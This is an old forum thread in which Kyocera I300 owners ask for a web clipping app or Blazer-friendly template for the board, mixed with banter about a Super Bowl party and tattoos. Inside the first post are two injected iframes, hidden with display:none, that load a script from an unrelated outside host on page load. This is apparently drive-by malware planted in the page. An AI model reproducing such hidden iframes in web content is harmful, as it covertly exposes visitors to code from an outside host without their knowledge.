+ Reply to Thread

Someone make a web app for this site!

Someone make a web clipping app for this site. That way when were all out, we can access the site when were out on our phones. Power to the geeks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    over and out....

I've got a lot of minutes to burn now and am on the board quite a bit through Blazer already.

I'm not 100% sure how much this board's software allows the display to be customized, but if it's possible to set up an alternate view of the same discussion board, it would be cool if one were available that's Blazer-optimized. Perhaps doing away with the tables and color-coding elements within each posting... something like:

[ up ] Someone make a webapp for this site!

killyt Someone make a web clipping app for this site. That way when were all out, we can access the site when were out on our phones. Power to the geeks! 6-Jan-2002 12:30pm

mjorange I've got a lot of minutes to burn now and am on the board quite a bit through Blazer already. 6-Jan-2002 2:30pm

miamicanes I'm not 100% sure how much this board's software allows the display to be customized, but if it's possible to set up an alternate view of the same discussion board, it would be cool if one were available that's Blazer-optimized. Perhaps doing away with the tables and color-coding elements within each posting... 6-Jan-2002 8:03pm

with messages that you haven't read yet (I think this board's software keeps track) in red, the poster in boldface, the date/time in some alternate color... etc.

I've used this site with blazer a few times... once the graphics are cached, it works ok...

the system has template capabilities.... so it is VERY possible to simply develop a new template for this system, that you could choose to use when your using the I300 to browse....

I "heard" someone had already developed a template for this purpose, I just haven't found it yet....

Brooks

Administrator

Arrow

after seeing brooks' house, we need to have the superbowl party there!! hows 'bout it fikse?

yeah a pqa for this site would be grand.. but seems ill have to lug the laptop around when i go to LA this week..

hehe... no superbowl in HD, no party...... lame FOX doesn't do ANY High Definition...

Brooks

Marc are you telling me you can't stay away from the board for one week?:p Na! Me niether. Hey did I tell you my girlfriend was going to get a tattoo of a comp on her left thigh and a.....:p
    Just a little humor.

Administrator

Arrow

Originally posted by mjorange
    Marc are you telling me you can't stay away from the board for one week?:p Na! Me niether. Hey did I tell you my girlfriend was going to get a tattoo of a comp on her left thigh and a.....:p
    Just a little humor.

hmmm... i wonder if i ran that by my woman...

hey huney... want an i300 tattoo'ed to your.... that way ill have somehtign to look at while im... oops!! we have a pastor on board... :o

MJ your a bad influence.. (but i likes....)

:p

Beams from above...

Cool

Obviously you guys haven't downloaded the BIBLE application for your I300 yet...

Alright, everyone stand in a row with your I300 held out at arms length while I conjure up a prayer of purity for your evil hotsync!

:p :p :p

This site as a PQA?

You know what would be nice? If this site was available as a web clipping application. It would be cool if we could read the latest postings and even post our own thoughts under those postings. Is that possible
    Visit your I300 Headquarters.
    http://i300-fanatic.cjb.net

PalmVenue Guy
    That would be nice...especially for those who travel